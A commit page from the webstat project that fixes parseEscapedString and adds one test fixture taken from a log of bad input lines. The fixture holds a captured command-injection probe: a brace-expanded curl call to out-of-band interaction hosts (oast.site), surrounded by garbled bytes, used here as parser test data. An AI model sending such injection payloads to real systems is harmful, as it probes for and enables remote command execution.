diff options
| author | Dan Goodliffe <dan.goodliffe@octal.co.uk> | 2026-07-02 15:46:25 +0100 |
|---|---|---|
| committer | Dan Goodliffe <dan.goodliffe@octal.co.uk> | 2026-07-02 15:46:25 +0100 |
| commit | fbb5038105e26e07d34184544ea4c70892acef92 (patch) | |
| tree | 1bd79bc9280b65116dd714f202718e9a5e8d091b /test/fixtures/badHex.exp.txt | |
| parent | 3cc7a1b1c0bf84ffcb149741c9ca2c60d9f00068 (diff) | |
| download | webstat-fbb5038105e26e07d34184544ea4c70892acef92.tar.bz2 webstat-fbb5038105e26e07d34184544ea4c70892acef92.tar.xz webstat-fbb5038105e26e07d34184544ea4c70892acef92.zip | |
Fixes to parseEscapedString
Fix the warnings picked up by the latest clang-tidy.
Add test cases lifted from the bad_lines log.
Add missing support for \b in escaping.
Diffstat (limited to 'test/fixtures/badHex.exp.txt')
| -rw-r--r-- | test/fixtures/badHex.exp.txt | 1 |
1 files changed, 1 insertions, 0 deletions
diff --git a/test/fixtures/badHex.exp.txt b/test/fixtures/badHex.exp.txt new file mode 100644 index 0000000..fe881c9 --- /dev/null +++ b/test/fixtures/badHex.exp.txt @@ -0,0 +1 @@ +/׿ؿؿd¸;{curl,http:/d68kln4h7ttk42oulg6gs1q8cp6k5obp1.oast.site+-H+'User-Agent:+eUCxcw'};׿ؿؿd¸;{curl,http:/d68kln4h7ttk42oulg6gwee1i13nkzmsm.oast.site+-H+'User-Agent:+eUCxcw'};
\ No newline at end of file |
